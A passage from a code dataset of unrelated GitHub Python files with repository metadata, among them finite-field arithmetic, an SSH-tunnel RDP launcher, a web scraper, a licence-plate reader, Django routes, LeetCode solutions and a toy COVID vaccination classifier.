localPort))\r\n\r\ns.close()","repo_name":"BadoinoMatteo/ES_PYTHON_quarta","sub_path":"PHYTON/SOCKET/es4/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32887347328","text":"import numpy as np\n\n\nclass PrimeFieldElement:\n def __init__(self, value, p):\n if isinstance(value, PrimeFieldElement):\n self.value = value.value % p\n else:\n self.value = value % p\n self.p = p\n\n def __add__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return PrimeFieldElement((self.value + other.value) % self.p, self.p)\n\n def __sub__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return PrimeFieldElement((self.value - other.value) % self.p, self.p)\n\n def __mul__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return PrimeFieldElement((self.value * other.value) % self.p, self.p)\n \n def reciprocal(self):\n # Calculate the multiplicative inverse using the extended Euclidean algorithm\n a, b = self.value, self.p\n x, y, u, v = 0, 1, 1, 0\n while a != 0:\n q, r = b // a, b % a\n m, n = x - u * q, y - v * q\n b, a, x, y, u, v = a, r, u, v, m, n\n if b == 1:\n # The multiplicative inverse exists\n return PrimeFieldElement(x % self.p, self.p)\n else:\n raise ValueError(f\"{self.value} has no multiplicative inverse modulo {self.p}\")\n\n def __pow__(self, exponent):\n if not isinstance(exponent, int):\n return ValueError('exponent should be int')\n if exponent < 0:\n multinv = self.reciprocal()\n return multinv ** (-exponent)\n return PrimeFieldElement(pow(self.value, exponent, self.p), self.p)\n\n def __eq__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return self.value == other.value\n \n def __lt__(self, other):\n if self.p != other.p:\n raise ValueError(\"Modulus p must be the same for both operands.\")\n return self.value < other.value\n\n def __str__(self):\n return str(self.value)\n\n def __repr__(self):\n return str(self.value)\n\n\nclass PrimeField:\n def __init__(self, p, n=1):\n if n != 1:\n return NotImplementedError(f'n != 1 is not supported yet')\n from utils import is_prime\n if not is_prime(p):\n return ValueError('p must be prime')\n self.p = p\n self.n = n\n self.elements = None\n \n if self.n == 1:\n elements = []\n for i in range(0, p):\n elements.append(PrimeFieldElement(i, p))\n self.elements = np.array(elements, dtype=object)\n \n def apply(self, func, x=None, multiplicative=False, unique=False):\n if x is None:\n if multiplicative:\n elements = self.multiplicative()\n else:\n elements = self.elements.copy()\n else:\n elements = np.array([PrimeFieldElement(el, self.p, sym=self.sym) for el in x], dtype=object)\n print(elements)\n images = np.array([func(el) for el in elements], dtype=object)\n if unique:\n images = np.unique(images)\n return images\n \n def multiplicative(self):\n return self.elements[1:].copy()\n \n def squares(self):\n squares = self.multiplicative() ** 2\n squares = np.unique(squares)\n return squares\n \n def __getitem__(self, n):\n if isinstance(n, int):\n # If a single integer is provided, return the corresponding element\n return self.elements[n % self.p]\n elif isinstance(n, (list, tuple, np.ndarray)):\n # If a list, tuple, or NumPy array of integers is provided, return a new CustomArrayWrapper\n # with the selected elements\n if isinstance(n, (list, tuple)):\n selected_elements = type(n)(self.elements[[i % self.p for i in n]].copy())\n else:\n selected_elements = self.elements[[i % self.p for i in n].copy()]\n return selected_elements\n else:\n raise TypeError(\"Unsupported index type. Use int or iterable of ints.\")\n","repo_name":"thatdeep/galois","sub_path":"galois_field/prime_field.py","file_name":"prime_field.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18182607767","text":"import tkinter as tk\r\nfrom PIL import Image, ImageTk\r\nfrom Weather_graph import plot_graph\r\nfrom News_api import get_news\r\nfrom Ads import display_image\r\n\r\n# this creates the window\r\nwindow = tk.Tk()\r\nwindow.geometry(\"1920x1080\")\r\nwindow.title(\"Smart Fridge App\")\r\n\r\n# this loads the weather graph and puts it in the top left part of the window\r\nimage = Image.open(\"weather_graph.png\")\r\nimage = image.resize((650, 400))\r\nphoto = ImageTk.PhotoImage(image) # this creates a TKINTER PHOTO IMAGE OBJECT with the resized image\r\nlabel = tk.Label(window, image=photo) # this creates a label to display the image\r\nlabel.place(x=0, y=0) # this sets the position of the label\r\n\r\n# this loads the background picture for the news and puts it in the bottom part of the window\r\nuser_image = Image.open(\"Breaking_news2.png\")\r\nuser_image = user_image.resize((1920, 680))\r\nuser_photo = ImageTk.PhotoImage(user_image)\r\nuser_label = tk.Label(window, image=user_photo)\r\nuser_label.place(x=0, y=400)\r\n\r\n# this loads the ads and puts it at the top right part of the window\r\nad_image = Image.open(\"random_image.png\")\r\nad_image = ad_image.resize((650, 400))\r\nad_photo = ImageTk.PhotoImage(ad_image)\r\nad_label = tk.Label(window, image=ad_photo)\r\nad_label.place(x=650, y=0)\r\n\r\nwindow.mainloop()\r\n","repo_name":"Roxybuel/GLprojects","sub_path":"Smart_fridge_app.py","file_name":"Smart_fridge_app.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71729912872","text":"import yaml\nimport subprocess\nimport signal\nimport socket\nimport time\nimport os\n\nDIRNAME = os.path.dirname(__file__)\n\ntunnel_process = None # Global variable to hold the SSH process\nrdp_process = None\n\n\ndef terminate_processes(signal, frame):\n global tunnel_process, rdp_process\n print(\"\\nExiting\")\n if tunnel_process is not None and tunnel_process.poll() is None: # Check if process still running\n tunnel_process.terminate()\n if rdp_process is not None:\n rdp_process.terminate()\n exit(0)\n \n \ndef is_tunnel_up():\n try:\n with socket.create_connection((\"localhost\", 13389), timeout=1):\n return True\n except socket.error:\n return False\n\n\ndef main():\n global tunnel_process, rdp_process\n\n # Set up signal handler for SIGINT (CTRL-C)\n signal.signal(signal.SIGINT, terminate_processes)\n\n # Load configuration from YAML file\n with open(os.path.join(DIRNAME, 'rdc_config.yaml'), 'r') as file:\n config = yaml.safe_load(file)\n\n # Display menu\n for i, host in enumerate(config['hosts'], start=1):\n print(f\"{i}. {host['name']}\")\n \n # Prompt user to select remote host\n selection_input = input('Enter number: ')\n try:\n selection = int(selection_input) - 1\n except Exception as e:\n exit(f\"Error: {e}\")\n \n selected_host = config['hosts'][selection]\n\n # Create SSH tunnel\n tunnel_cmd = (\n f\"ssh -L 13389:localhost:{selected_host['rdp_remote_port']} \"\n f\"-p {selected_host['ssh_port']} \"\n f\"{selected_host['user']}@{selected_host['hostname']} -N\"\n )\n print(\"Starting SSH tunnel...\")\n print(tunnel_cmd)\n\n tunnel_process = subprocess.Popen(tunnel_cmd)\n while tunnel_process is not None and not is_tunnel_up():\n if tunnel_process.poll() is not None:\n exit(1)\n time.sleep(1)\n print(\"SSH tunnel is up!\\n\")\n\n try:\n # Start Remote Desktop Connection\n # rdp_command = ['mstsc', '/v:localhost:13389', f\"/user:{selected_host['user']}\", f'/pass:{rdp_password}']\n rdp_command = ['mstsc', os.path.join(DIRNAME, 'rdc_client_config.rdc'), '/v:localhost:13389', \"/f\"]\n print(\"Starting RDP connection...\\n\")\n rdp_process = subprocess.run(rdp_command, shell=False)\n except Exception as e:\n print(f\"Error: {e}\")\n finally:\n # Terminate SSH tunnel\n if tunnel_process is not None and tunnel_process.poll() is None: # Check if process still running\n tunnel_process.terminate()\n print(\"Terminated SSH tunnel\")\n print(\"Exiting\")\n exit(0)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rechim25/rdc-setup","sub_path":"rdc_connect.py","file_name":"rdc_connect.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70336542632","text":"'''IP代理及微信推文爬取实战 by 王宇韬'''\n#如果下面的内容被我注释掉了,大家可以选中,然后ctrl+/(Spyder中的快捷键是ctrl+1)取消注释\n\n'''4:微信推文爬取实战之爬取当天新闻'''\n#下面的IP代理的API地址得你自己买一下才能运行成功。\nimport requests\nimport re\nimport time\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}\n\nfrom urllib.parse import quote\ndef weixin(company):\n headers['Referer'] = 'https://weixin.sogou.com/weixin?type=2&query=' + quote(company)\n url = 'https://weixin.sogou.com/weixin?type=2&query=' + company + '&tsn=1'\n res = requests.get(url, headers=headers, timeout=10).text\n # print(res)\n\n p_href = 'data-share=\"(.*?)\">.*?'\n p_title = 'data-share=\".*?\">(.*?)'\n p_date = 'timeConvert\\(\\'(.*?)\\'\\)'\n href = re.findall(p_href, res)\n title = re.findall(p_title, res)\n date = re.findall(p_date, res)\n\n for i in range(len(title)):\n title[i] = re.sub('<.*?>', '', title[i])\n title[i] = re.sub('&.*?;', '', title[i])\n href[i] = re.sub('amp;', '', href[i])\n timestamp = int(date[i])\n timeArray = time.localtime(timestamp)\n date[i] = time.strftime(\"%Y-%m-%d\", timeArray)\n print(str(i + 1) + '.' + title[i] + ' - ' + date[i])\n print(href[i])\n\ncompanys = ['华能信托', '阿里巴巴', '万科集团', '百度', '腾讯']\nfor i in companys:\n try:\n weixin(i)\n print(i + '该公司微信推文爬取成功')\n except:\n print(i + '该公司微信推文爬取失败')\n","repo_name":"zbh123/hobby","sub_path":"Python金融实战资料/源代码 201906更新/第11课:IP代理及微信推文实战/4.微信推文爬取实战之爬取当天文章.py","file_name":"4.微信推文爬取实战之爬取当天文章.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"44263155575","text":"import cv2\nimport numpy as np\nimport pytesseract\nfrom PIL import Image\n\nclass PlateReader:\n def __init__(self):\n self.font = cv2.FONT_HERSHEY_PLAIN\n\n def load_model(self, weight_path: str, cfg_path: str):\n self.net = cv2.dnn.readNet(weight_path, cfg_path)\n with open(\"classes-ocr.names\", \"r\") as f:\n self.classes = [line.strip() for line in f.readlines()]\n self.layers_names = self.net.getLayerNames()\n\n unconnected_layers = self.net.getUnconnectedOutLayers()\n if unconnected_layers.ndim == 1: # Scalar indices\n self.output_layers = [self.layers_names[i - 1] for i in unconnected_layers]\n else: # Assume it's an array of indices\n self.output_layers = [self.layers_names[i[0] - 1] for i in unconnected_layers]\n\n self.colors = np.random.uniform(0, 255, size=(len(self.classes), 3))\n\n def load_image(self, img_path):\n img = cv2.imread(img_path)\n if img is None:\n raise FileNotFoundError(f\"Image not found: {img_path}\")\n height, width, channels = img.shape\n return img, height, width, channels\n\n def read_plate(self, img):\n blob = cv2.dnn.blobFromImage(img, scalefactor=0.00392, size=(320, 320), mean=(0, 0, 0), swapRB=True, crop=False)\n self.net.setInput(blob)\n outputs = self.net.forward(self.output_layers)\n return blob, outputs\n\n def get_boxes(self, outputs, width, height, threshold=0.3):\n boxes = []\n confidences = []\n class_ids = []\n for output in outputs:\n for detect in output:\n scores = detect[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > threshold:\n center_x = int(detect[0] * width)\n center_y = int(detect[1] * height)\n w = int(detect[2] * width)\n h = int(detect[3] * height)\n x = int(center_x - w/2)\n y = int(center_y - h / 2)\n boxes.append([x, y, w, h])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n return boxes, confidences, class_ids\n\n def draw_labels(self, boxes, confidences, class_ids, img):\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)\n characters = []\n for i in indexes:\n box = boxes[i]\n x, y, w, h = box\n self.draw_label(img, x, y, w, h, confidences[i], i)\n label = str(self.classes[class_ids[i]])\n characters.append((label, x))\n characters.sort(key=lambda x: x[1])\n plate = self.convert_to_plate_string(characters)\n return img, plate\n\n def draw_label(self, img, x, y, w, h, confidence, i):\n color = self.colors[i % len(self.colors)]\n cv2.rectangle(img, (x, y), (x + w, y + h), color, 2)\n cv2.putText(img, f\"{confidence:.2f}%\", (x, y - 6), self.font, 1, color, 2)\n\n def convert_to_plate_string(self, characters):\n plate = \"\"\n for label, _ in characters:\n plate += self.convert_to_arabic_if_needed(label)\n return plate\n\n def convert_to_plate_string(self, characters):\n plate = \"\"\n for label, _ in characters:\n plate += self.convert_to_arabic_if_needed(label)\n\n # Handle the specific pattern of numbers followed by 'ww'\n plate = self.handle_ww_pattern(plate)\n\n return plate\n\n def handle_ww_pattern(self, plate):\n if 'w' in plate:\n # Extract the number part before 'ww'\n print(plate)\n number_part = plate.split('ww')[0]\n # Remove any spaces or decorative elements\n number_part = ''.join(filter(str.isdigit, number_part))\n # Reconstruct the plate with 'ww'\n return number_part + ' ww'\n return plate\n\n def convert_to_arabic_if_needed(self, label):\n arabic_mappings = {'أ': 'A', 'ب': 'B', 'ج': 'J', 'د': 'D', 'ه': 'H', 'و': 'W', 'ي': 'Y'}\n return arabic_mappings.get(label, label)\n\n def tesseract_ocr(self, image, lang=\"eng\", psm=7):\n try:\n alphanumeric = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"\n options = f\"-l {lang} --psm {psm} -c tessedit_char_whitelist={alphanumeric}\"\n return pytesseract.image_to_string(image, config=options)\n except Exception as e:\n print(f\"OCR Error: {e}\")\n return \"\"","repo_name":"LeHaroun/LPAD","sub_path":"plate_reader.py","file_name":"plate_reader.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74192480874","text":"from django.urls import path\n\nfrom .views.flights import Flights\nfrom .views.url_shortcuts import UrlShortcutsIndex\nfrom .views.url_shortcuts import UrlShortcutsRows\n\nurlpatterns = [\n path(\"\", Flights.index, name='index'),\n path(\"list\", Flights.list, name='flights-list'),\n # path(\"list/\", Flights.list, name='flights-list'),\n path(\"create\", Flights.create, name='flights-create'),\n path(\"create-btn\", Flights.create_btn, name='flights-create-btn'),\n path(\"edit/\", Flights.edit, name='flights-edit'),\n path(\"get/\", Flights.get, name='flights-get'),\n path(\"url-shortcuts/\", UrlShortcutsIndex.as_view(), name='url_shortcuts_index'),\n path(\"url-shortcuts/rows\", UrlShortcutsRows.as_view(), name='url_shortcuts_rows')\n]","repo_name":"SWojcik800/Django-Htmx-Samples","sub_path":"django_htmx_samples/flights/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17708965932","text":"from typing import Any, Callable, Iterable, Optional\n\nfrom ignite.engine import Events\nfrom torch import profiler\nfrom torch.profiler import ProfilerActivity\n\nfrom flame.core.engine.engine import Engine\n\n\nclass profile(profiler.profile):\n def __init__(\n self,\n wait: int,\n warmup: int,\n active: int,\n repeat: int = 0,\n skip_first: int = 0,\n activities: Optional[Iterable[ProfilerActivity]] = None,\n on_trace_ready: Optional[Callable[..., Any]] = None,\n record_shapes: bool = False,\n profile_memory: bool = False,\n with_stack: bool = False,\n with_flops: bool = False,\n ):\n schedule = profiler.schedule(wait=wait, warmup=warmup, active=active, repeat=repeat, skip_first=skip_first)\n super(profile, self).__init__(\n activities=activities,\n schedule=schedule,\n on_trace_ready=on_trace_ready,\n record_shapes=record_shapes,\n profile_memory=profile_memory,\n with_stack=with_stack,\n with_flops=with_flops,\n )\n\n self.steps = (wait + warmup + active) * repeat + skip_first\n\n def step(self, engine: Engine) -> None:\n super(profile, self).step()\n\n if self.step_num >= self.steps:\n engine.terminate()\n\n def attach(self, engine: Engine) -> None:\n engine.state.epoch_length = self.steps\n\n if not engine.has_event_handler(self.step, Events.ITERATION_COMPLETED):\n engine.add_event_handler(Events.ITERATION_COMPLETED, self.step)\n","repo_name":"phungpx/flamev2","sub_path":"flame/handlers/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"22454255136","text":"import matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS\n\n\ndef WCLOUD(stpwrd, imgfname=\"wordcloud.png\", w=400, h=400):\n\n # Lecture des tweets\n file = open(\"res.csv\", \"r\")\n text = \"\"\n for line in file.readlines():\n text += line.split(\",\")[2] + \" \"\n\n # Mots à ne pas prendre en compte par le systeme\n g_stopwords = stpwrd\n # optionally add: stopwords=STOPWORDS and change the arg below\n\n def generate_wordcloud(text):\n wordcloud = WordCloud(font_path='Roboto_Slab/RobotoSlab-Regular.ttf', # la font utilisé\n relative_scaling=1,\n width=w, # taille de l'image finale, prédit la résolution des mots aussi\n height=h,\n stopwords=g_stopwords).generate(text)\n plt.imsave(imgfname, wordcloud)\n\n generate_wordcloud(text)\n","repo_name":"jeanlapostolle/TwittAnalysis","sub_path":"wcloud.py","file_name":"wcloud.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36689110880","text":"# Grade book starts with a variable from last year, this houses a list containing (subject, grade)\r\nlast_semester_gradebook = [(\"politics\", 80), (\"latin\", 96), (\"dance\", 97), (\"architecture\", 65)]\r\n\r\n# Create a new list of classes for this year\r\nsubjects = [\"physics\", \"calculus\", \"poetry\", \"history\"]\r\n# Create a new list of grades for this year, in order of classes\r\ngrades = [98, 97, 85, 88]\r\n\r\n# Add a new class to list \"subjects\" you just finished called \"computer science\"\r\nsubjects.append(\"computer science\")\r\n# Add a new grade to list \"grades\" with a score of 100\r\ngrades.append(100)\r\n\r\n# Combine lists \"subjects\" and \"grades\" into a new list called \"gradebook\"\r\ngradebook = zip(subjects, grades)\r\n\r\nprint(list(gradebook)) # Print to confirm output, specify you want to output as a list otherwise its unreadable.\r\n\r\n# Combine this years list \"gradebook\" with last years list \"last_semester_gradebook\"\r\nfull_gradebook = list(gradebook) + list(last_semester_gradebook)\r\n\r\nprint(list(full_gradebook)) # Print to confirm output, specify you want to output as a list otherwise its unreadable\r\n","repo_name":"ChuckleWacker/Python","sub_path":"Week4_GradeBook_Project.py","file_name":"Week4_GradeBook_Project.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74118713833","text":"from itertools import accumulate\n\n\n# https://leetcode.com/problems/maximum-product-of-the-length-of-two-palindromic-substrings/discuss/1389421/Python-O(n)-with-Manacher-explained\nclass Solution:\n def maxProduct(self, s: str) -> int:\n t1 = self.helper(s)\n t2 = self.helper(s[::-1])[::-1][1:] + [0]\n\n return max(x * y for x, y in zip(t1, t2))\n\n def manachers(self, s):\n a = '@#' + '#'.join(s) + '#$'\n z = [0] * len(a)\n center = right = 0\n\n for i in range(1, len(a) - 1):\n if i < right:\n z[i] = min(right - i, z[2 * center - i])\n while a[i + z[i] + 1] == a[i - z[i] - 1]:\n z[i] += 1\n if i + z[i] > right:\n center = i\n right = i + z[i]\n\n return z[2:-2:2]\n\n def helper(self, s):\n man = self.manachers(s)\n n = len(s)\n ints = [(i - man[i] // 2, i + man[i] // 2) for i in range(n)]\n arr = [0] * n\n\n for a, b in ints:\n arr[b] = max(arr[b], b - a + 1)\n\n for i in range(n - 2, -1, -1):\n arr[i] = max(arr[i], arr[i + 1] - 2)\n\n return list(accumulate(arr, max))\n","repo_name":"cabulous/leetcode","sub_path":"python/1960.py","file_name":"1960.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18491349736","text":"from django.shortcuts import render\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nimport joblib\r\nimport matplotlib.pyplot as plt\r\nfrom fastai.tabular.all import *\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef covid1(request):\r\n df = pd.read_csv('static/covid11.csv')\r\n data = df.values\r\n X = data[:, :-1]\r\n Y = data[:, -1:]\r\n value = ''\r\n\r\n if request.method == 'POST': \r\n age = float(request.POST['temp'])\r\n sex = float(request.POST['bp'])\r\n cp = float(request.POST['age'])\r\n trestbps = float(request.POST['nose'])\r\n chol = float(request.POST['breath'])\r\n chol1 = float(request.POST['ht'])\r\n chol2= float(request.POST['a'])\r\n chol3 = float(request.POST['b'])\r\n chol4 = float(request.POST['c'])\r\n chol5 = float(request.POST['d'])\r\n chol6 = float(request.POST['e'])\r\n chol7 = float(request.POST['f'])\r\n\r\n data = np.array(\r\n (age,\r\n sex,\r\n cp,\r\n trestbps,\r\n chol,chol1,chol2,chol3,chol4,chol5,chol6,2,2,2\r\n )\r\n ).reshape(1, 14)\r\n rand_forest=joblib.load(\"/home/jishnusaurav/Downloads/priovax-main/machine-learning/model.pkl\")\r\n predictions = rand_forest.predict(data)\r\n x=str(predictions[0])\r\n print(predictions[0])\r\n print(\"123\")\r\n if(x==\"1\"):\r\n x=\"You should get vaccinated!\"\r\n else:\r\n x=\"You need not get vaccinated right now!\"\r\n return render(request,\r\n 'diseasepredictor/rforest.html',\r\n {\r\n 'context': x\r\n })\r\n else:\r\n return render(request,\r\n 'diseasepredictor/rforest.html',\r\n {\r\n 'context': \"No data\"\r\n })\r\ndef covid2(request):\r\n df = pd.read_csv('static/covid22.csv')\r\n data = df.values\r\n X = data[:, :-1]\r\n Y = data[:, -1]\r\n print(X.shape, Y.shape)\r\n\r\n value = ''\r\n if request.method == 'POST':\r\n\r\n temp = request.POST['temp']\r\n age = request.POST['age']\r\n bp = request.POST['bp']\r\n nose = request.POST['nose']\r\n breath = request.POST['breath']\r\n\r\n if bp=='Yes' or bp == 'yes' or bp=='YES':\r\n bp=1\r\n elif bp=='No' or bp == 'no' or bp=='NO':\r\n bp=0\r\n \r\n else:\r\n return render(request,\r\n 'diseasepredictor/rforest.html',\r\n {\r\n 'context': value,\r\n 'error':\"Please enter correct data\"\r\n })\r\n \r\n if nose=='Yes' or nose == 'yes' or nose=='YES':\r\n nose=1\r\n elif nose=='No' or nose == 'no' or nose=='NO':\r\n nose=0\r\n else:\r\n return render(request,\r\n 'diseasepredictor/knn.html',\r\n {\r\n 'context': value,\r\n 'error':\"Please enter correct data\"\r\n })\r\n if breath=='Yes' or breath == 'yes' or breath=='YES':\r\n breath=1\r\n elif breath=='No' or breath == 'no' or breath=='NO':\r\n breath=0\r\n else:\r\n return render(request,\r\n 'diseasepredictor/knn.html',\r\n {\r\n 'context': value,\r\n 'error':\"Please enter correct data\"\r\n })\r\n\r\n user_data = np.array(\r\n (temp,\r\n bp,\r\n age,\r\n nose,\r\n breath\r\n )\r\n ).reshape(1, 5)\r\n\r\n\r\n rf = KNeighborsClassifier()\r\n rf.fit(np.nan_to_num(X), Y)\r\n\r\n predictions = rf.predict(user_data)\r\n print(predictions)\r\n\r\n if int(predictions[0]) == 1:\r\n value = 'You May have COVID-19 Virus. Kindly get in contact with a Doctor!!!'\r\n elif int(predictions[0]) == 0:\r\n value = \"You are SAFE!!!\"\r\n\r\n return render(request,\r\n 'diseasepredictor/knn.html',\r\n {\r\n 'context': value\r\n })\r\n\r\n\r\ndef home(request):\r\n\r\n return render(request,\r\n 'diseasepredictor/predict.html')\r\n\r\n\r\n\r\n# def handler404(request):\r\n# return render(request, '404.html', status=404)\r\n","repo_name":"jishnusaurav/CovTech","sub_path":"diseasepredictor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4288655457","text":"from collections import Counter\nimport sys, pdb, csv, pdb, math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom collections import defaultdict\n\n# csvfile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orders.csv\")\n# columns = ['order_id', 'user_id']\n# df1 = pd.DataFrame(csvfile, columns=columns)\n# # print(df1.head())\n#\n# for i in range(500):\n# print(df1.iloc[i]['order_id'])\n\ndef numIterms(): #gives us a dictionary with key as the user id and the value as the number of times they've ordered\n finalDict = Counter()\n d = defaultdict(list)\n i = 0\n retCountDict = Counter()\n numTimesOrdered = Counter()\n ordersFile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/order_products__traint.csv\",dtype=str)\n readerFile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orderst.csv\")\n colForReaders = [\"order_id\",\"user_id\"]\n colForOrders = [\"order_id\"]\n reader = pd.DataFrame(readerFile, columns = colForReaders)\n orders = pd.DataFrame(ordersFile, columns = colForOrders)\n\n traintList = orders.values\n userList = reader.values\n\n for temp in userList:\n numTimesOrdered[temp[1]] += 1\n\n for i in range(len(traintList)):\n retCountDict[traintList[i][0]] += 1 #it's the dictionary where the key is the order id and the value is the number of items\n for i in range(len(userList)):\n userID = userList[i][1]\n orderID = userList[i][0]\n\n if(retCountDict[str(orderID)]) != 0:\n finalDict[userID] += int(retCountDict[str(orderID)]) #key -> user id and value is the number of items that user ordered\n else:\n continue\n\n #finalDict -=> has key the user id and the value is the total number of items they ordered\n #numTimesOrdered -=> key as the user id, value as the total number of orders made by user\n print(avgItems(userList,finalDict,numTimesOrdered))\n\n return 0\n\ndef avgItems(uList,fDict, nTimesOrdered): #userList, finalDict, numTimesOrdered\n avgDict = Counter()\n for users in uList:\n user = users[1]\n totalItems = int(fDict[user])\n totalTimes = int(nTimesOrdered[user])\n avgDict[user] += (totalItems/totalTimes)\n return avgDict\n\n\n\n\ndef numOrdersPerUser():\n numOrders = Counter()\n i = 0\n reader = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orders.csv\",iterator=True, chunksize=1000)\n columnsForReader = ['user_id']\n df1 = pd.DataFrame(reader, columns=columnsForReader)\n\n for i in range(500):\n numOrders[df1.iloc[i]['user_id']] += 1\n\n return numOrders\n\n\ndef totalNumItemsOrdered():\n numItems = Counter()\n i = 0\n readerFile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orders.csv\")\n ordersFile = pd.read_csv(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/order_products__prior.csv\")\n colForReaders = [\"order_id\",\"user_id\"]\n colForOrders = [\"order_id\"]\n\n reader = pd.DataFrame(readerFile, columns = colForReaders)\n orders = pd.DataFrame(ordersFile, columns = colForOrders)\n\n\n for i in range(100):\n itemsUserOrdered = itemsOrdered(reader, orders, reader.iloc[i][\"order_id\"], i)\n numItems[reader.iloc[i][\"user_id\"]] += itemsUserOrdered\n return numItems\n\ndef itemsOrdered(rDF, oDF, orderID,i):\n orderIdCounter = Counter()\n retNum = 0\n\n for row in oDF.itertuples():\n if row[1] == orderID:\n retNum += 1\n return retNum\n\n # userID = ordersDF.iloc[i][\"user_id\"]\n # orderID = ordersDF.iloc[i][\"order_id\"]\n #\n # for j in len(itemsDF): #not sure about how to iterate through the thing\n # if itemsDF.iloc[j][\"order_id\"] == orderID:\n # orderIdCounter[orderID] += 1\ndef aussie():\n userDict = pickle.load( open( \"save.p\", \"rb\" ) )\n for i in range(1,4):\n print(\"for i = \",i,\"the value is \",userDict[i]) #where i is is the orderid\n return 0\n\ndef partOne():\n i = 0\n with open(\"/Users/rsanyal/Documents/Books/Spring 17/STA 141C/final/orders.csv\") as csvfile:\n reader = csv.reader(csvfile,delimiter=',')\n for row in reader:\n if i < 500 and row[1] != \"user_id\":\n P1[row[1]] += 1\n i += 1\n\n lens = np.arange(len(D))\n plt.bar(lens, P1.values(),width=0.3, align='center',alpha = 0.2)\n plt.xticks(lens, P1.keys())\n plt.show()\n csvfile.close()\n\ndef main():\n # numOrdersPerUser()\n # print(totalNumItemsOrdered())\n # aussie()\n numIterms()\nmain()\n","repo_name":"rishsanyal/finals","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25399600611","text":"\"\"\"\nGiven an array arr[] of N non-negative integers representing the height of blocks at index i as Ai where the width of each block is 1. Compute how much water can be trapped in between blocks after raining.\nThe structure is like below:\n| |\n|_|\nWe can trap 2 units of water in the middle gap.\n\n\n\nExample 1:\n\nInput:\nN = 4\narr[] = {7,4,0,9}\nOutput: 10\nExplanation: Water trapped by the \nblock of height 4 is 3 units, block \nof height 0 is 7 units. So, the \ntotal unit of water trapped is \n10 units.\nExample 2:\n\nInput:\nN = 3\narr[] = {6,9,9}\nOutput: 0\nExplanation: No water will be trapped.\nYour Task:\nThe task is to complete the function trappingWater() which returns the total amount of water that can be trapped.\n\nExpected Time Complexity: O(N).\nExpected Auxiliary Space: O(N).\n\nConstraints:\n3 <= N <= 107\n0 <= Ai <= 108\n\"\"\"\n\ndef trappingWater(arr,n):\n left = []\n right = []\n max = arr[0]\n for i in range(n):\n if max <= arr[i]:\n max = arr[i]\n left.append(max)\n max = arr[n-1]\n for i in range(n-1, -1, -1):\n if max <= arr[i]:\n max = arr[i]\n right.append(max)\n sum = 0\n right.reverse()\n for i in range(n):\n x = min(left[i], right[i]) - arr[i]\n if x > 0:\n sum = sum + x\n return sum\n","repo_name":"himanshu2801/Geeksforgeeks","sub_path":"Trapping Rain Water.py","file_name":"Trapping Rain Water.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24044069166","text":"import os\nimport subprocess\nimport sys\n\nf = None\naliases = {}\nwithalias = False\n\ndef loadAliases():\n\t\"\"\"\n\tThis function loads the aliases we define in our file Aliases in folder files 